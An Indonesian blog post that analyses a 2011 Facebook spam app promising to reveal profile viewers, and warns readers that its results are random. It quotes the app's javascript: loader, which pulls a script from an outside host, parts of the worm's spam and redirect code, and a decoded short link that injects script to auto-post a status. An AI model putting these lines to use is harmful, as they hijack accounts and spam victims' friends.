Social Icons

Pages

Rabu, 04 Mei 2011

Aplikasi Facebook Spam "pengen tau siapa aja yang Sering lihat profilemu"

pengen tau siapa aja yang Sering lihat profilemu? http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645

kok bnyak bgt ya link ini di status temen spam facebook lagi
Aplikasi atau link pengen tau siapa aja Yang Sering lihat Profilemu adalah bohong belaka, karena hanya bersifat mengacak (random).
Mari, kita analisis. Di App tersebut, Anda akan di suruh mengkopi alamat URL: [javascript:(a=(b=document).createElement('script')).src='//www.zingapoker.byethost4.com/_.js',b.body.appendChild(a);void(0)] yang ada di Grup Jempoler Indonesia. Perhatikan, Facebook Anda akan digiring menuju link www.zingapoker.byethost4.com seperti tertera di atas.
Nah silahkan Anda kunjungi saja isi www.zingapoker.byethost4.com, maka Anda akan menemukan 4 komponen yakni
.pureftpd-rename.36788.f8ccaee0
_.js
final.htm
qwq.js
Kemudian Klik link _.js pada halaman tersebut, maka Anda akan melihat bahasa PHP berikut ini :
=======================================================
var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = ’%firstname% pengen tau saipa aja yang Sering lihat profilemu? :) http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645′;
var postmessage = ’wow…ternyata banyak juga yang suka lihat profileku y : \n\ %tf% - 436 views \n\ %tf% - 83 views \n\ %tf% - 42 views \n\ %tf% - 30 views \n\ pengen tau saipa aja yang Sering lihat profilemu? http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645′;
var redirect = ’http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645′;
var eventdesc = ’You can now see whos been on your page! \n\ \n\ Go here: http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645&’+randomnumber+’ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\”;
var eventname = ’See Who Likes You!’;
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
if (wf <= 0) {
setTimeout(function () {
window['top']['location']['href'] = redirect;
}, 500);
};
};
=================================================
Perhatikan string/teks yang di cetak tebal, terlihat bahwa pemilihan teman dan jumlah klik menggunakan fungsi RANDOM (acak pilih sebarang). Artinya pemilihan teman teman Fb yang melihat profil Anda dan jumlah berapa kali mereka melihat profil Anda adalah proses mengacak secara Random.
Termasuk tulisan di wall[wow...ternyata banyak juga yang suka lihat profileku y] adalah bawaan dari program ini.
Aplikasi ini juga akan secara acak mengirim pesan Chatt kepada teman-teman Anda yang kebetulan sedang OL. Coba sekarang Anda buka elemen qwq.js pada halamanwww.zingapoker.byethost4.com, akan tertampil kode bahasa :
====================================
var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = ’%firstname% See who views your profile http://www.facebook.com/pages/JEMPOLERs_LIKE/143364539065677?sk=app_106878476015645′;
var postmessage = ’My Top Profile Viewers: \n\ %tf% - 436 views \n\ %tf% - 83 views \n\ %tf% - 42 views \n\ %tf% - 30 views \n\ See who views your profile http://www.facebook.com/pages/JEMPOLERs_LIKE/143364539065677?sk=app_106878476015645′;
var redirect = ’http://www.facebook.com/JempolersIndonesia?sk=app_106878476015645′;
var eventdesc = ’You can now see whos been on your page! \n\ \n\ Go here: http://www.facebook.com/pages/JEMPOLERs_LIKE/143364539065677?sk=app_106878476015645&’+randomnumber+’ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\”;
var eventname = ’See Who Likes You!’;
====================================
Oleh karena itu, jangan percaya pada data/hasil yang di tampilkan, karena hanya mengacak belaka. Justru ada kemungkinan data-data Anda dan teman-teman Anda bisa dicuri oleh aplikasi ini.

URL Pendek Facebook

Barusan saya melihat status orang yang hampir sama. Awalnya saya kira ini memanfaatkan aplikasi facebook. Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt’%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms[0].submit();}%3C/script%3E

Huh …tinyurl-nya berfungsi untuk memendekkan javascriptnya
kalau kita decode jadilah seperti ini

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt'
Dasar orang isenk Bukan virus, tapi ya mengubah satus kita sesuai dengan message value di atas.